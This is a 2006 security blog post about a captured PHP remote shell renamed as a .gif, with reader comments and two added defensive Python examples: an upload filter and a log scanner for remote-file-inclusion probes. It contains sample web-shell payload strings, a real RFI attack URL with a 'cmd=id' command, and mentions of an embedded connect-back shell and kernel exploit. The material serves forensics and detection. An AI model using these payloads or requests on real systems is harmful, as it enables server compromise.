Yet Another Remote Shell
Here’s another one of the failed attacks on ha.ckers.org. I copied the file in case anyone wants to do forensics on it. It’s located here. The odd part is that it is a .gif file. I’m not sure what filter they were attempting to evade by renaming the file, but it didn’t do much.
Is anyone cataloguing this stuff? Should I continue to post it? If not I’ll save myself the trouble, but I wanted to keep it here for any of the AV guys who visit the site. They may get more out of this stuff than other people.
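The renamed-extension trick above only works against an upload filter that trusts the file name. As an added example (not code from the post or from the shell it describes), here is the content-level check such a filter should run: the decision rests on the file's own bytes, so a PHP shell saved as `.gif` is rejected whether it is a bare script or a GIF header with PHP appended. The sample payloads and the function names are constructed for this illustration.

```python
import re

# Real GIF files start with one of these two signatures.
GIF_MAGIC = (b"GIF87a", b"GIF89a")

# PHP open tags: "<?php", the echo tag "<?=", and the bare short tag "<? ".
# "<?xml" deliberately does not match.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def looks_like_gif(data: bytes) -> bool:
    """True if the first six bytes are a GIF87a/GIF89a header."""
    return data[:6] in GIF_MAGIC


def contains_php(data: bytes) -> bool:
    """True if a PHP open tag appears anywhere in the bytes."""
    return PHP_TAG_RE.search(data) is not None


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Every rejection after the first is based on
    content, not on the name the uploader chose."""
    if not filename.lower().endswith(".gif"):
        return False, "extension not allowed"
    if not looks_like_gif(data):
        return False, "header is not GIF"
    # A GIF header followed by PHP code still passes the magic check, so the
    # body is scanned as well.
    if contains_php(data):
        return False, "PHP code embedded in image"
    return True, "ok"


# Constructed samples: a minimal real GIF, a bare PHP shell renamed to .gif,
# and a GIF/PHP polyglot.
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"
RENAMED_SHELL = b"<?php system($_GET['cmd']); ?>"
POLYGLOT = b"GIF89a" + b"\x01\x00\x01\x00" + b"<?php eval($_POST['x']); ?>"

if __name__ == "__main__":
    for name, blob in [("logo.gif", REAL_GIF),
                       ("shell.gif", RENAMED_SHELL),
                       ("poly.gif", POLYGLOT)]:
        print(name, check_upload(name, blob))
```

The tag scan is a signature, and signatures can be dodged (obfuscated tags, other server-side languages), so the check that actually closes the hole is serving the upload directory from a path where the web server never executes scripts; this check is the early filter in front of that.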

August 29th, 2006 at 9:54 am
I’ve logged into the previous one you posted (the ircbot) and reported it to an irccop after having fun with the ‘hackers’ by pretending I was one of the infected machines.
So if more pop up, I wouldn't mind toying with them.
Although this one seems less intriguing.
August 29th, 2006 at 10:09 am
I'm going to take a look at this shell after I get a few other things sorted, set some local tests going, and then if I find anything interesting I will post back here.
August 29th, 2006 at 10:11 am
Norton Anti-Virus detects it as a virus. So it should be known already.
August 29th, 2006 at 10:51 am
Yongge Wang, do you think it would be the connect-back shell "Data Cha0s Connect Back Shell" and the exploit "Linux kernel do_brk vma overflow exploit" that it carries inside it that are setting your AV off? One of the options of this shell is to write the connect-back shell or the exploit to disk, depending on the user's choice (my personal thought is that it will be the exploit that's setting your AV's bells ringing, but that's just my thought). If you're willing to run a test for me (since I'm not on a Win platform), could you take the connect-back shell and the exploit out of the shell and then see if your AV still goes off?
August 29th, 2006 at 2:17 pm
Yes, you are right. After I delete the words "Cha0s…" and "Linux kernel…", Norton Anti-Virus will not give any alert.
December 26th, 2006 at 4:12 pm
I have 17 malicious files saved into an encrypted 7z file. Whenever somebody or some bot tries to use xss on my website, I get an alert and try to save the file they use. And I usually can, but not all the time. Some of them are extremely well formatted and very, very clever… The biggest is 153 kBytes, and really, really complex and clever… And NOD32 recognizes only 2-3 of them as trojans.
Well, basically I am here because somebody tried to hack my site with the file “http://ha.ckers.org/files/tool25.dat?&cmd=id”….
Anyway, I found these blogs very useful, especially the one which is about the JS code which tries to run an exe…
Keep going! ….. I mean, keep blogging, and not keep cracking my tiny and almost unknown site. Okay?
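The request quoted in the comment above has the shape of a remote file inclusion probe (my reading, not something the post itself spells out): a URL pointing at a hosted shell is fed into a parameter the target passes to include(), the trailing `?&` cuts off anything the target appends, and `cmd=id` ends up as a parameter of the victim's own request, which the included shell then reads. As an added example (not code from the post), here is a small scanner that flags such lines in Apache combined-format logs and pulls out the client, the abused parameter, the remote host and path, and the command. The log lines are constructed; the shell URL is the one quoted in the comment.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client, ident, user, time, request line, status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself an absolute URL is the RFI tell.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi(line: str):
    """Return a dict describing the RFI attempt in one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qsl percent-decodes values, so an encoded "http%3A%2F%2F..." is
    # seen the same way the target application would see it.
    params = parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True)
    outer = dict(params)
    for name, value in params:
        if not REMOTE_RE.match(value):
            continue
        remote = urlsplit(value)
        inner = dict(parse_qsl(remote.query, keep_blank_values=True))
        return {
            "client": m.group("ip"),
            "param": name,
            "remote_host": remote.hostname,
            "remote_path": remote.path,
            # With a bare "?&cmd=id" the command lands in the victim's own
            # query string (outer); if the attacker encoded the "&", it stays
            # inside the remote URL (inner).
            "shell_cmd": outer.get("cmd", inner.get("cmd")),
            "status": int(m.group("status")),
        }
    return None


def scan(log_text: str):
    """Run find_rfi over every line and keep the hits."""
    return [hit for hit in (find_rfi(l) for l in log_text.splitlines()) if hit]


# Constructed sample log: one bare probe, one benign request, one probe with
# the injected URL percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Dec/2006:15:58:11 +0100] "GET /index.php?page=http://ha.ckers.org/files/tool25.dat?&cmd=id HTTP/1.0" 200 1432 "-" "Mozilla/4.0"
198.51.100.9 - - [26/Dec/2006:16:02:40 +0100] "GET /index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Dec/2006:16:03:02 +0100] "GET /forum/view.php?file=http%3A%2F%2Fha.ckers.org%2Ffiles%2Ftool25.dat%3F%26cmd%3Did HTTP/1.0" 404 213 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 on a line like the first one is worth a closer look than a 404: it says the script that took the parameter answered normally, and whether it actually fetched and ran the remote file depends on the include settings of the host, which the log alone does not reveal.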
December 26th, 2006 at 4:38 pm
The attack on your site wasn't from ha.ckers.org; it did, however, involve trying to use the tools25.dat file that is hosted here (which has been temporarily moved).